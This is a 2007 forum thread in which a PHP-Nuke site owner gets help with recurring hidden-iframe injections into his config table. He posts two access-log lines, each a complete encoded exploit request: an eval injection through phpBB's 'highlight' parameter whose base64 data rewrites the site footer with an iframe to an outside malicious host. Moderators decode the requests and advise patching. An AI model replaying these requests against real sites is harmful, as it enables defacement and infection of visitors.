Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Rumbaar
Regular
Regular


Joined: Apr 16, 2004
Posts: 78
Location: Melbourne, Australia

PostPosted: Tue Sep 18, 2007 6:08 pm Reply with quote

I'm running a few php-nuke sites, two of my older versions heavily bastardized with various protection codes and updates, one is core 6.6 and the other later maybe 7.1 .. not sure. The first one can't be updated due to various legacy data.

Now in recent weeks have encounted 'hacks' into the config table of phpnuke with the addition of a 'hidden' iframe with a link/redirector to an alternate site. With a fully secure system it does nothing and running FF helps, I just go in and change back the data. But that's not ideal.

No other changes are being made to the config table or site. Any thoughts on how this is possible? or suggestions.

Thx in advance,

_________________
Victim's aren't we all! 
View user's profile Send private message Visit poster's website
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Tue Sep 18, 2007 8:23 pm Reply with quote

Have you checked your site access logs? That's usually the best place to start. You should be able to use NukeSentinel, even on older sites. Most cross site scripting can be stopped by using admin authentication - NukeSentinel has tools for that, but you can also find how to set it up by searching the forums here. You can usually see SQL injection (another common way to deface / gain inappropriate access to a site) in the site log. NukeSentinel will stop that, but not if the site has addons that bypass normal Nuke database access functions (some addons do that, and some galleries allow bad files to be uploaded if you're not careful). Hopefully that helps...

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
Rumbaar
PostPosted: Tue Sep 18, 2007 10:40 pm Reply with quote

I'll be sure to look at the access logs tonight. Hopefully something striking will present itself in the mass of logs.

I don't have many, if any, additional addon to the core php-nuke of that period.
 
Rumbaar
PostPosted: Tue Sep 18, 2007 11:56 pm Reply with quote

Well reviewed the logs and the only things out of the 'normal' attacks are the following. They appear to be coded, and I'm not sure of the correct process to decode them so I can read what they are doing. Any thoughts
Code:
 81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGZvb3QxPSRnIik7&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnLyB0YXJnZXQ9Ymxhbms%2BPGltZyBoc3BhY2U9MTAgc3JjPWltYWdlcy9wb3dlcmVkL3Bvd2VyZWQ1LmpwZyBib3JkZXI9MD48L2E%2BPGJyPjxpZnJhbWUgc3JjPWh0dHA6Ly9wb3Jub3BlcnZvaS5jb20vaS5waHAgd2lkdGg9MSBoZWlnaHQ9MT48L2lmcmFtZT48IS0taTItLT4n&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527


and followed by this 35min laters

Code:
81.29.242.2 - /modules.php?name=Forums&file=viewtopic&t=5597&w=JGc9dXJsZGVjb2RlKGJhc2U2NF9kZWNvZGUoJF9HRVRbcTFdKSk7ICRkYi0%2Bc3FsX3F1ZXJ5KCJVUERBVEUgbnVrZV9jb25maWcgU0VUIGNvcHlyaWdodD0kZyIpOw%3D%3D&q1=JzxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnPjxmb250IGNsYXNzPWZvb3Rtc2dfbD5QSFAtTnVrZTwvZm9udD48L2E%2BIENvcHlyaWdodCAmY29weTsgMjAwNSBieSBGcmFuY2lzY28gQnVyemkuIFRoaXMgaXMgZnJlZSBzb2Z0d2FyZSBhbmQgeW91IG1heSByZWRpc3RyaWJ1dGUgaXQgdW5kZXIgdGhlIDxhIGhyZWY9aHR0cDovL3BocG51a2Uub3JnL2ZpbGVzL2dwbC50eHQ%2BPGZvbnQgY2xhc3M9Zm9vdG1zZ19sPkdQTDwvZm9udD48L2E%2BLiBQSFAtTnVrZSBjb21lcyB3aXRoIGFic29sdXRlbHkgbm8gd2FycmFudHkgZm9yIGRldGFpbHMgc2VlIHRoZSA8YSBocmVmPWh0dHA6Ly9waHBudWtlLm9yZy9maWxlcy9ncGwudHh0Pjxmb250IGNsYXNzPWZvb3Rtc2dfbD5saWNlbnNlPC9mb250PjwvYT4uPGlmcmFtZSBzcmM9aHR0cDovL3Bvcm5vcGVydm9pLmNvbS9pLnBocCB3aWR0aD0xIGhlaWdodD0xPjwvaWZyYW1lPjwhLS1pMi0tPic%3D&highlight=%2527%252eeval%2528urldecode%2528base64_decode%2528$_GET[w]%2529%2529%2529%252e%2527


Sorry about the large single line. I can see URLdecode in there. Thought they did return a 403 on the server.

-Rumbaar
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Sep 19, 2007 1:58 am Reply with quote

Mm your log must be truncated. As you said, they are coded.

The injection itself is the highlight variable. That's a known issue with phpBB and has been secured. It should not affect BBToNuke 2.0.22

The injection itself does a simple
eval urldecode base64_decode of the $_GET['w] variable

Decoding that, it does another urldecode, base64_decode of the $_GET[q1] variable
Where that is, I have no idea.. I think your log doesn't display it all.
Finally it uses that decoded output to add code to your nuke_config table in the copyright field

That could be something simple like Javascript to grab your admin cookies and wreck havoc on your site.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Rumbaar
PostPosted: Wed Sep 19, 2007 4:26 pm Reply with quote

Thx evaders,

Ok, I'm certainly not running BBtoNuke 2.0.22 Sad

Is there a 'simple' method to apply a patch or modification to my old, old version of phpBBnuke?
 
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Wed Sep 19, 2007 5:24 pm Reply with quote

Evaders, I'm curious about this exploit. Does that mean there was code in an older version of PHPBB that expected a w variable in $_GET, and the code would do an eval urldecode base64_decode of that variable???

_________________
Only registered users can see links on this board! Get registered or login! - An Event Calendar for PHP-Nuke
Only registered users can see links on this board! Get registered or login! - A Google Maps Nuke Module 
View user's profile Send private message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Wed Sep 19, 2007 5:37 pm Reply with quote

Rumbaar did you searched already on google for your site.Sites with dangerous iframes are there special marked.However there are different kind of iframe attacks and some iframes are more or less harmless but I would just not run such an old nuke version because there isn´t a module within wich is secure and patch 2.9 for these versions is some years old.
You could update only your forum that works I did that in the past with my old nuke version.But if I where you I would upgrade to RavenNuke. I did that with 6.5 in place and everything works.
 
View user's profile Send private message
evaders99
PostPosted: Wed Sep 19, 2007 6:02 pm Reply with quote

The exploit is in the "highlight" variable. It is the trigger that allows all the other nasty code to work. The $_GET variables used there are just extra payload, trying to obfuscate the exploit from your logs. You don't even notice the highlight= part unless you scroll to the end of that log

You need to get yourself secured. Get the latest Patched files for your version at Only registered users can see links on this board! Get registered or login!
And then upgrade your forums to the latest 2.0.22. The BBToNuke packages (from the same site) are what you want. No, they are not cumulative - you will have to install each sequentially.

That's going to be a lot of work. You can either
a) start with fresh Patched files and re-do your customizations
or
b) try to make the Patched changes directly to your current system.

It really depends on how much code changes you'd have to do, and whether you're familiar enough with the code to do it. I prefer solution A myself. Easier to redo customizations that you've already done.
Either way, get a good file difference program - I use WinMerge, its free!
 
Rumbaar
PostPosted: Wed Sep 19, 2007 7:56 pm Reply with quote

I'm pretty quick in discovering the iframes Susann, so they don't last long enough for the Google spiders to catch and/or flag.

I'll look to nukeresources and see if I can patch it manually, it sounds like a long list of work.

I've tried to do A) evaders in the past, but with later character restrictions various 'allowable' username characters (mine and others) don't seem to be compatible with the 7.6 secure nuke. One of my newer sites uses 7.6 ravennuke, but previous two from older days don't. They are around from '03 and I wouldn't even begin to remember all the changes I've done since then.

With this 'payload' is the only place they can insert code is into the config table or is that just the ideal place. I mean can they inject into any table in the database?
 
evaders99
PostPosted: Thu Sep 20, 2007 4:06 pm Reply with quote

They can inject any SQL, download and run other code. Thus the wide number of attacks against phpBB systems.
 
Rumbaar
PostPosted: Thu Sep 20, 2007 5:55 pm Reply with quote

I've found the core php-nuke patches on that site, but can't seem to find the specific BBtoNuke patches though.
 
evaders99
PostPosted: Thu Sep 20, 2007 11:40 pm Reply with quote

Search the Downloads with the specific BBToNuke version numbers.

If you confirm what phpNuke version you are using, and you've not done any upgrades before, this list contains what BBToNuke version the stock phpNuke came with. (Sorry this list hasn't been updated in a while)
Only registered users can see links on this board! Get registered or login!
Look under the phpNuke column. The (2.0.xx) number is what you'd have currently.

So phpNuke 6.6 came with 2.0.2. I don't even know if there's a version standalone of 2.0.3. You're almost better off upgrading to at least phpNuke 7.6 with stock 2.0.10. Then going for BBToNuke 2.0.12 - 2.0.22
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©